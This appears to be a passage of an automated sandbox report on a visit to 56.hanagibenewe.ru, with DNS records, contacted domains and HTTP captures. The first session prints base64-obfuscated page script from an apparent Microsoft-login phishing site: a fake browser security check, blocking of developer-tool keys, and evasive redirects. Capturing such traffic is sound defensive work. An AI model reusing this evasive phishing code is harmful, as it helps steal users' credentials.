                                                                        Jan 16, 2025 09:20:53.189898968 CET1.1.1.1192.168.2.50x1779No error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189898968 CET1.1.1.1192.168.2.50x1779No error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716537952 CET1.1.1.1192.168.2.50x1024No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716537952 CET1.1.1.1192.168.2.50x1024No error (0)nel.measure.office.net.edgesuite.neta1894.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716557980 CET1.1.1.1192.168.2.50xb163No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716557980 CET1.1.1.1192.168.2.50xb163No error (0)nel.measure.office.net.edgesuite.neta1894.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716557980 CET1.1.1.1192.168.2.50xb163No error (0)a1894.dscb.akamai.net2.18.64.215A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.716557980 CET1.1.1.1192.168.2.50xb163No error (0)a1894.dscb.akamai.net2.18.64.220A (IP address)IN (0x0001)false
                                                                        • 56.hanagibenewe.ru
                                                                        • https:
                                                                          • challenges.cloudflare.com
                                                                          • code.jquery.com
                                                                          • cdnjs.cloudflare.com
                                                                          • oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru
                                                                          • login.microsoftonline.com
                                                                          • www.office.com
                                                                        • a.nel.cloudflare.com
                                                                        • identity.nel.measure.office.net
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549718104.21.96.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:16 UTC666OUTGET /Y7MD/ HTTP/1.1
                                                                        Host: 56.hanagibenewe.ru
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Upgrade-Insecure-Requests: 1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: navigate
                                                                        Sec-Fetch-User: ?1
                                                                        Sec-Fetch-Dest: document
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:17 UTC1250INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Cache-Control: no-cache, private
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jteGIhn%2B5IFy44UR2x7I%2FWKgG9D3nBABb15%2FrW%2BcNxJi2YaMVMBC5EAflCwxKU%2BfgDpsL66jeeiUP%2FWMkU0RDX2Cjf3R7oItIpIoA5oUzic0%2B1PBpv4JSyOkFsMxpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=5550&min_rtt=5547&rtt_var=2086&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1578&delivery_rate=511218&cwnd=242&unsent_bytes=0&cid=88ce243dac5f772b&ts=135&x=0"
                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InJOTm1BYnFIRjRMOEFWb3VZUklzbHc9PSIsInZhbHVlIjoiemF2elZveUJPbUpLNThJZEVhNkFuWjB2cWJjMm1wNXBvVEJVV21nZlFpVDdmUncrWWJKcHZ1UHlLbnR0SGdvTHpJcFQxcnprb20reTZYZ1E4aThTVXk5VlJaM3VUeVJhMmRGV2ZDc1JrWmE1elp5R2tCQkhnbFhHbUxWUFVJTEMiLCJtYWMiOiJiNDE0MmMyNjNkODQ3NDcyZDdkMjZmMWJkMzE3YTA1NGEwZDJhMzcyYzY2NTkxZmIyM2QyMDkxMWZjMzYyNjdmIiwidGFnIjoiIn0%3D; expires=Thu, 16-Jan-2025 10:20:17 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                        2025-01-16 08:20:17 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 56 32 57 6c 42 43 4d 6e 52 4e 52 6b 6c 6a 63 58 42 74 52 33 5a 35 52 6e 52 71 5a 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 58 5a 47 53 6e 59 31 61 33 6c 6c 56 54 41 76 52 47 4d 30 4e 6a 52 43 55 56 49 78 61 6d 51 31 62 55 4a 58 63 32 77 30 4e 56 68 47 59 6d 5a 55 56 57 31 44 54 7a 64 70 55 6b 6f 77 53 57 31 47 55 56 64 36 56 32 56 6b 51 6d 39 4a 4d 45 56 43 51 32 35 4a 52 6c 68 4e 53 6d 70 56 62 54 52 47 63 55 31 57 62 47 39 43 55 56 56 6b 64 6a 56 47 59 30 56 57 4d 6c 56 4e 62 6c 6c 56 61 45 31 42 5a 54 4e 55 54 6e 56 4a 55 45 68 55 51 6c 70 57 62 47 35 36 4b 30 39 30 5a 47 56 4e 57 6b 70 6f 55 6e 42 4b 65 6e 46 71 61 56 4d
                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlV2WlBCMnRNRkljcXBtR3Z5RnRqZVE9PSIsInZhbHVlIjoiZXZGSnY1a3llVTAvRGM0NjRCUVIxamQ1bUJXc2w0NVhGYmZUVW1DTzdpUkowSW1GUVd6V2VkQm9JMEVCQ25JRlhNSmpVbTRGcU1WbG9CUVVkdjVGY0VWMlVNbllVaE1BZTNUTnVJUEhUQlpWbG56K090ZGVNWkpoUnBKenFqaVM
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 34 30 38 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 73 65 63 72 65 74 20 6f 66 20 67 65 74 74 69 6e 67 20 61 68 65 61 64 20 69 73 20 67 65 74 74 69 6e 67 20 73 74 61 72 74 65 64 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 51 55 54 55 75 61 47 46 75 59 57 64 70 59 6d 56 75 5a 58 64 6c 4c 6e 4a 31 4c 31 6b 33 54 55 51 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63
                                                                        Data Ascii: 4082<script>/* The secret of getting ahead is getting started. */if(atob("aHR0cHM6Ly9QUTUuaGFuYWdpYmVuZXdlLnJ1L1k3TUQv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 4e 71 52 48 52 74 61 46 70 47 56 57
                                                                        Data Ascii: oYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2NqRHRtaFpGVW
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e
                                                                        Data Ascii: ZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 45 68 4a 64 33 68 55 56 56 64 74 55 32 34 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 68 4a 64 33 68 55 56 56 64 74 55 32 34 67 4c 53 42 54 5a 6b 46 4f 61 6d 74 4d 61 48 4a 4a 49 44 34 67 61 46 6c 32 5a 45 64 75 64 33 42 4b 52 43 41 6d 4a 69 41 68 5a 46 64 6c 57 55 64 50 54 6e 5a 77 56 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 55 31 50 65 47 4e 76 64 48 4a 45 63 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6b 56 32 56 5a 52 30 39 4f 64 6e 42 57 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76
                                                                        Data Ascii: EhJd3hUVVdtU24gPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKEhJd3hUVVdtU24gLSBTZkFOamtMaHJJID4gaFl2ZEdud3BKRCAmJiAhZFdlWUdPTnZwVikgew0KICAgICAgICAgICAgYU1PeGNvdHJEcCA9IHRydWU7DQogICAgICAgICAgICBkV2VZR09OdnBWID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlv
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 54 6d 68 30 63 46 46 53 55 6d 5a 56 64 79 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 4a 33 4d 67 63 32 56 6a 64 58 4a 70 64 48 6b 67 5a 6d 56 68 64 48 56 79 5a 58 4d 67 5a 6d 39 79 49 48 4e 68 5a 6d 55 67 59 6e 4a 76 64 33 4e 70 62 6d 63 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 7a 59 33 4a 70 63 48 51 2b 44 51 70 30 64
                                                                        Data Ascii: F0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iTmh0cFFSUmZVdyI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyJ3Mgc2VjdXJpdHkgZmVhdHVyZXMgZm9yIHNhZmUgYnJvd3NpbmcuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjxzY3JpcHQ+DQp0d
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 68 54 55 39 34 59 32 39 30 63 6b 52 77 49 44 30 39 49 47 5a 68 62 48 4e 6c 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 73 62 32 46 6b 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48
                                                                        Data Ascii: 9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBpZihhTU94Y290ckRwID09IGZhbHNlKXsNCiAgICAgICAgbG9jYXRpb24ucmVsb2FkKCk7DQogICAgICAgIH
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 20 73 75 63 63 65 73 73 2e 20 2a 2f 0d 0a 69 66 28 77 75 61 56 75 69 45 4f 6b 4f 20 3d 3d 20 46 48 63 63 55 4d 50 46 75 67 29 7b 0d 0a 63 6f 6e 73 74 20 47 66 59 64 6b 6c 66 67 61 50 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 73 41 48 76 4b 53 4b 49 76 51 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 73 41 48 76 4b 53 4b 49 76 51 2e 70 61 74 68 6e 61 6d 65 20 3d 20 73 41 48 76 4b 53 4b 49 76 51 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 74 65 61 4c 45 5a 77 54 76 6d 20 3d 20 73 41 48 76 4b 53 4b 49 76 51 2e
                                                                        Data Ascii: success. */if(wuaVuiEOkO == FHccUMPFug){const GfYdklfgaP = window.location.pathname.split('%23')[0].split('%3F')[0];if (sAHvKSKIvQ.pathname.endsWith('/')) {sAHvKSKIvQ.pathname = sAHvKSKIvQ.pathname.slice(0, -1);}const teaLEZwTvm = sAHvKSKIvQ.
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 4e 71 52 48 52 74 61 46 70 47 56 57 59 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 59 32 70 45 64 47 31 6f 57 6b 5a 56 5a 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 4e 71 52 48 52 74 61 46 70 47 56 57 59 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67
                                                                        Data Ascii: WR0aDoxMjAwcHgpew0KI2NqRHRtaFpGVWYgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojY2pEdG1oWkZVZiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2NqRHRtaFpGVWYuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDog
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53
                                                                        Data Ascii: I7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549719104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:17 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:17 UTC386INHTTP/1.1 302 Found
                                                                        Date: Thu, 16 Jan 2025 08:20:17 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        access-control-allow-origin: *
                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                        cross-origin-resource-policy: cross-origin
                                                                        location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf7bed764414-EWR
                                                                        alt-svc: h3=":443"; ma=86400


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549720151.101.66.1374433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:17 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                        Host: code.jquery.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:17 UTC613INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 89501
                                                                        Server: nginx
                                                                        Content-Type: application/javascript; charset=utf-8
                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                        ETag: "28feccc0-15d9d"
                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                        Accept-Ranges: bytes
                                                                        Date: Thu, 16 Jan 2025 08:20:17 GMT
                                                                        Age: 2500144
                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740036-EWR
                                                                        X-Cache: HIT, HIT
                                                                        X-Cache-Hits: 2774, 3
                                                                        X-Timer: S1737015618.889677,VS0,VE0
                                                                        Vary: Accept-Encoding
                                                                        2025-01-16 08:20:17 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
